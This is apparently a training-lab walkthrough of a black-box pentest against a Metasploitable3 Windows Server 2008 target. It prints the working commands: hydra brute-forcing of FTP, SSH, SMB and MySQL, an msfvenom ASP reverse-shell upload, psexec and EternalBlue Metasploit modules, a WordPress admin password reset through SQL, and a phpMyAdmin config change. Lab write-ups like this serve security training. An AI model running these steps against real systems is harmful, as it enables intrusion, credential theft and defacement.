🔬Win Black Box Pentest

🔬 INE LAB - Metasploitable3
Target IP: 10.2.29.246
Metasploit Framework is permitted

Port Scanning & Enumeration

Obtain the target IP address from the /etc/hosts file

cat /etc/hosts
	10.2.29.246 demo.ine.local
ping 10.2.29.246
ping demo.ine.local
cd Desktop
mkdir Win2k8
cd WiWin2k8/ # To store all the notes and files about the target

Port scanning with nmap

nmap -sV 10.2.29.246
# Scans 1000 common ports

21/tcp    open  ftp                  Microsoft ftpd
22/tcp    open  ssh                  OpenSSH 7.1 (protocol 2.0)
80/tcp    open  http                 Microsoft IIS httpd 7.5
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3306/tcp  open  mysql                MySQL 5.5.20-log
4848/tcp  open  ssl/http             Oracle Glassfish Application Server
7676/tcp  open  java-message-service Java Message Service 301
8080/tcp  open  http                 Sun GlassFish Open Source Edition  4.0
8181/tcp  open  ssl/http             Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)
9200/tcp  open  wap-wsp?
49152/tcp open  msrpc                Microsoft Windows RPC
49153/tcp open  msrpc                Microsoft Windows RPC
49154/tcp open  msrpc                Microsoft Windows RPC
49155/tcp open  msrpc                Microsoft Windows RPC

Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Perform an advanced nmap scan and export it into an xml file

nmap -T4 -PA -sC -sV -p 1-10000 10.2.29.246 -oX nmap_10k
# -T4 = Aggressive speed scan
# -PA = TCP ACK discovery
# -sC = default NSE scripts
# -sV = service version detection
# -p 1-10000 = ports range
# -oX = XML output file

# A full port range scan can be also done, not necessary here
# nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_all

e.g. Extra nmap useful scans commands

nmap -T4 -PA -sC -sV -p- 10.2.29.246 -oX nmap_all
nmap -sU -sV 10.2.29.246 -oX nmap_udp

Access the web server with a browser
- http://10.2.29.246/
- http://10.2.29.246/hahaha.jpg
- View page source

Banner grabbing on some services

nc -nv 10.2.29.246 21
	220 Microsoft FTP Service

Other webpages
- https://10.2.29.246:4848/
- http://10.2.29.246:8080/
- http://10.2.29.246:9200/
- http://10.2.29.246:8484/
- http://10.2.29.246:8585/
  - http://10.2.29.246:8585/wordpress/

SMB Enumeration

Import scan results in MSF by creating a dedicated workspace

service postgresql start && msfconsole

db_status
workspace -a Win2k8
setg RHOST 10.2.29.246
setg RHOSTS 10.2.29.246
db_import nmap_10k

hosts
services
use auxiliary/scanner/smb/smb_version
run
hosts
# Name of computer is correct now

Targeting

IIS / FTP

nmap -sV -sC -p21,80 10.2.29.246

# FTP is part of the Microsoft IIS package

Try anonymous:anonymous with FTP

ftp 10.2.29.246

Brute-force the FTP server

hydra -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.29.246 ftp

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_users.txt 10.2.29.246 ftp -I

[21][ftp] host: 10.2.29.246   login: administrator   password: vagrant
[21][ftp] host: 10.2.29.246   login: vagrant   password: vagrant

📌 2 FTP users:
administrator:vagrant
vagrant:vagrant

ftp 10.2.29.246
# Use administrator:vagrant

ls
    229 Entering Extended Passive Mode (|||49567|)
    125 Data connection already open; Transfer starting.
    10-28-21  07:22AM       <DIR>          aspnet_client
    10-28-21  07:19AM                   28 caidao.asp
    10-28-21  07:18AM                34251 hahaha.jpg
    10-28-21  07:18AM              1116928 index.html
    10-28-21  07:18AM              2439511 seven_of_hearts.html
    10-28-21  07:18AM               384916 six_of_diamonds.zip
    10-28-21  07:22AM               184946 welcome.png
    
# Web server home directory

IIS can execute .asp files
Generate an .asp reverse shell payload and upload it with FTP

cd Desktop/Win2k8/
ip -br -c a
	10.10.24.4/24
	
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.24.4 LPORT=1234 -f asp > shell.aspx

ftp 10.2.29.246
# use vagrant:vagrant
put shell.aspx

Back to the msfconsole session tab

use multi/handler
set payload windows/shell/reverse_tcp
set LHOST 10.10.24.4
set LPORT 1234

Open the browser and navigate to
- 10.2.29.246/shell.aspx
In this case the reverse shell don't work.
The next step of an attacker can be to deface the website - modifying the web application

ftp 10.2.29.246
get index.html
# modify the index.html than upload the edited web page
put index.html

OpenSSH

Obtain the new target IP if the lab was restarted.
Target IP: 10.2.16.83
Based on the FTP Enumeration:
administrator:vagrant
vagrant:vagrant

nmap -sV -sC -p 22 10.2.16.83

22/tcp open  ssh     OpenSSH 7.1 (protocol 2.0)
| ssh-hostkey: 
|   2048 83:56:2e:69:b5:2d:b4:9a:e4:7f:97:86:d8:bc:ae:7b (RSA)
|_  521 c0:e2:da:9d:e2:1e:58:09:7e:80:07:ec:3e:b4:57:f5 (ECDSA)

searchsploit OpenSSH 7.1
# Use username enumeration if needed

Brute-force SSH

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_users.txt 10.2.16.83 ssh

hydra -l administrator /usr/share/wordlists/metasploit/unix_users.txt 10.2.16.83 ssh
# No valid password for SSH - administrator

[22][ssh] host: 10.2.16.83   login: vagrant   password: vagrant

User SSH login can be tried

ssh [email protected]
# vagrant:vagrant
# WORKS!

ssh [email protected]
# administrator:vagrant
# DOES NOT work!

net localgroup administrators
# "vagrant" is in the Administrators Group

Obtain a Meterpreter session

msfconsole

use auxiliary/scanner/ssh/ssh_login
setg RHOST 10.2.16.83
setg RHOSTS 10.2.16.83
set USERNAME vagrant
set PASSWORD vagrant
run
session 1
# CTRL+Z to background

sessions -u 1
	[-] Target is running Windows on an unsupported architecture such as Windows ARM!

# The manual msfvenom payload upload can be tried

Back on the SSH session

bash
net localgroup administrators
whoami /priv

SMB

Target IP: 10.2.26.45
Based on the FTP & SSH Enumeration:
administrator:vagrant - FTP
vagrant:vagrant - FTP + SSH

nmap -sV -sC -p 445 10.2.26.45

445/tcp open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds

Brute-force SMB

hydra -l administrator -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.26.45 smb

hydra -l vagrant -P /usr/share/wordlists/metasploit/unix_passwords.txt 10.2.26.45 smb

[445][smb] host: 10.2.26.45   login: administrator   password: vagrant
[445][smb] host: 10.2.26.45   login: vagrant   password: vagrant

Enumerate shares

smbclient -L 10.2.26.45 -U vagrant

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC

smbmap -u vagrant -p vagrant -H 10.2.26.45

    [+] IP: 10.2.26.45:445  Name: demo.ine.local
     Disk   Permissions     Comment
     ----   -----------     -------
     ADMIN$ READ, WRITE     Remote Admin
     C$ 	READ, WRITE     Default share
     IPC$ 	NO ACCESS       Remote IPC

Enumerate others system user accounts

enum4linux -u vagrant -p vagrant -U 10.2.26.45

user:[Administrator]
user:[anakin_skywalker]
user:[artoo_detoo]
user:[ben_kenobi]
user:[boba_fett]
user:[chewbacca]
user:[c_three_pio]
user:[darth_vader]
user:[greedo]
user:[Guest]
user:[han_solo]
user:[jabba_hutt]
user:[jarjar_binks]
user:[kylo_ren]
user:[lando_calrissian]
user:[leia_organa]
user:[luke_skywalker]
user:[sshd]
user:[sshd_server]
user:[vagrant]

Enumerate users with MSF

msfconsole

use auxiliary/scanner/smb/smb_enumusers
set RHOSTS 10.2.26.45
set SMBUser vagrant
set SMBPass vagrant
run

[+] 10.2.26.45:445 - VAGRANT-2008R2 [ Administrator, anakin_skywalker, artoo_detoo, ben_kenobi, boba_fett, chewbacca, c_three_pio, darth_vader, greedo, Guest, han_solo, jabba_hutt, jarjar_binks, kylo_ren, lando_calrissian, leia_organa, luke_skywalker, sshd, sshd_server, vagrant ] ( LockoutTries=0 PasswordMin=0 )

In a new terminal, use psexec.py to try SMB authentication

locate psexec.py
cp /usr/share/doc/python3-impacket/examples/psexec.py .
chmod +x psexec.py

python3 psexec.py [email protected]

Obtain a Meterpreter session with MSF

msfconsole -q
use exploit/windows/smb/psexec
set RHOSTS 10.2.26.45
set SMBUser Administrator
set SMBPass vagrant
set payload windows/x64/meterpreter/reverse_tcp
run

If no account credentials can be found, use the EternalBlue vulnerability exploit since the system target is a Win Server 2008 R2

msfconsole -q

use exploit/windows/smb/ms17_010_eternalblue
options
set RHOSTS 10.2.26.45
run

MySQL

nmap -sV -sC -p 3306,8585 10.2.26.45

3306/tcp open  mysql   MySQL 5.5.20-log
8585/tcp open  http    Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)

Search for MySQL exploits

searchsploit MySQL 5.5
# There are only Privilege Escalation exploits

Brute-force MySQL

msfconsole

use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.2.26.45
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
run

[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Found remote MySQL version 5.5.20
[!] 10.2.26.45:3306 - No active DB -- Credential data will not be saved!
[+] 10.2.26.45:3306 - 10.2.26.45:3306 - Success: 'root:'

📌 root password is empty

mysql -u root -p -h 10.2.26.45

show databases;
use wordpress;
show tables;
select * from wp_users;

Change admin WordPress user's password

❗ DO NOT Change passwords in a real pentest

UPDATE wp_users SET user_pass = MD5('password123') WHERE user_login = 'admin';

Access via browser
- http://10.2.26.45:8585/wordpress/wp-admin

Try to gain access to phpMyAdmin using MSF
- Access the target through SMB and modify phpMyAdmin configuration file

# Open the MSF tab
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.2.26.45
run

sysinfo

Move into the wamp folder

cd /
cd wamp
dir
cd www\\wordpress
cat wp-config.php

Change WordPress admin password

cd C:\\wamp\\alias
download phpmyadmin.conf

# In another terminal modify the file
vim /root/Desktop/phpmyadmin.conf
# modify it by deleting the lines under "AllowOverride all" and insert
	Allow from all

# Write and close

# In the MSFconsole
upload phpmyadmin.conf

# Apache service must be restarted
shell
net stop wampapache
net start wampapache

Access phpMyAdmin
- http://10.2.26.45:8585/phpmyadmin/
- it automatically logs in since the root password is null

❗ DO NOT Change passwords in a real pentest

Previous🔬Win Workflow Platform - MSF Next🔬Linux Black Box Pentest

Last updated 2 years ago

Was this helpful?